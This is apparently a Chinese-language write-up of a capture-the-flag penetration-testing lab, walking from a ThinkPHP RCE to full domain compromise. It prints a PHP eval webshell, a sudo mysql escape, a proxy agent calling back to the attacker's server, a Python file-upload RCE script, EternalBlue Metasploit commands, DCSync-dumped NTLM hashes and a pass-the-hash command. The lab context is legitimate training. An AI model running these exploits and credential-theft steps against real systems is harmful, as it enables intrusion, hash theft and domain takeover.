Initial
Initial
flag01
入口是一个XX 电源远程管理系统 39.99.228.114
使用Thinkphp综合利用工具发现漏洞
[+] http://39.99.136.167 的检测结果如下:
=====================================================================
[+] 目标存在tp5_construct_code_exec_1漏洞
直接用工具getshell
http://39.99.228.114/shell.php
<?php phpinfo(); @eval($_POST['shell']); ?>
用蚁剑连上去之后发现需要提权
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
使用mysql去读取flag01
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'
Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.
flag01: flag{60b53231-
flag{60b53231-
flag02
上传一个fscan和linux_x64_agent,先使用fscan扫一下
(www-data:/var/www/html) $ ./fscan -h 172.22.1.0/24
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] WebTitle [http://172.22.1.15](http://172.22.1.15/) code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle [http://172.22.1.18](http://172.22.1.18/) code:302 len:0 title:None 跳转url: [http://172.22.1.18?m=login](http://172.22.1.18/?m=login)
[*] WebTitle [http://172.22.1.18?m=login](http://172.22.1.18/?m=login) code:200 len:4012 title:信呼协同办公系统
[+] PocScan [http://172.22.1.15](http://172.22.1.15/) poc-yaml-thinkphp5023-method-rce poc1
在vps上开个代理
# vps
./linux_x64_admin -l 6666
# 靶机
./linux_x64_agent -c <ip>:<port>
[*] Starting admin node on port 6666 .-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-. ( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-. (_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--. / _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' / \ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') / '..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ / .-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_ \ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__) '-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--' { v2.2 Author:ph4ntom } [*] Waiting for new connection... [*] Connection from node 39.99.228.114:44284 is set up successfully! Node id is 0 (admin) >> use 0 (node 0) >> socks 15000 [*] Trying to listen on 0.0.0.0:15000...... [*] Waiting for agent's response...... [*] Error: listen tcp 0.0.0.0:15000: bind: address already in use (node 0) >> socks 15001 [*] Trying to listen on 0.0.0.0:15001...... [*] Waiting for agent's response...... [*] Socks start successfully!
使用Proxifier或者kali自带的proxychains4 就能访问内网的服务
http://172.22.1.18?m=login 是一个信呼协同办公系统,弱密码是admin/admin123 即可登录后台,这个系统有文件上传漏洞,直接找poc
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
//9
/upload/2025-04/10_13503074.php
<br />
<b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-04\10_13503074.php</b> on line <b>1</b><br />
Process finished with exit code 0
然后蚁剑设置好socks代理之后直接连,在C:/Users/Administrator/flag/flag02.txt目录下找到flag02
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
2ce3-4813-87d4-
flag03
使用proxychains4 设置好代理然后使用msf打永恒之蓝漏洞
vim /etc/proxychains4.conf
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.21:4444 [+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
... OK
[*] Sending stage (203846 bytes) to 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (192.168.1.102:37750 -> 156.238.233.21:15001) at 2025-04-10 14:04:50 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter >
这里显示打进去了,接下来就是用mimikatz搜集域内用户hash
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 300dfbf6006e83a7e27246328130f87d 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ b55e337302b76f26b264ac7727cb9adf 4096
1108 XIAORANG-WIN7$ 55ba475072ff7532c01af709c4292864 4096
再用crackmapexec打PTH拿下域控
┌──(root㉿kali-plus)-[~]
└─# proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:445 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:135 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.1.2:49668 ... OK
SMB 172.22.1.2 445 DC01 [+] Executed command
SMB 172.22.1.2 445 DC01 ___ ___
SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / //
SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / /
SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
拿到flag03 e8f88d0d43d6} 最终的flag为flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
小结
入口是一个thinkphp的漏洞,找工具直接利用即可getshell,进去之后发现mysql有root权限,可以直接去找flag01,然后上传fscan和内网代理的工具,先用fscan扫一下,得到三台机子,一台是信呼协同办公系统,有现成的poc,直接打,上传木马连上去然后找到flag02,至于flag03,先打其中一台机子的永恒之蓝漏洞,打进去用mimikitz抓hash,然后用crackmapexec直接打就能拿下域控了,这个靶机还算简单,主要学一下内网代理和进入内网之后的操作。
浙公网安备 33010602011771号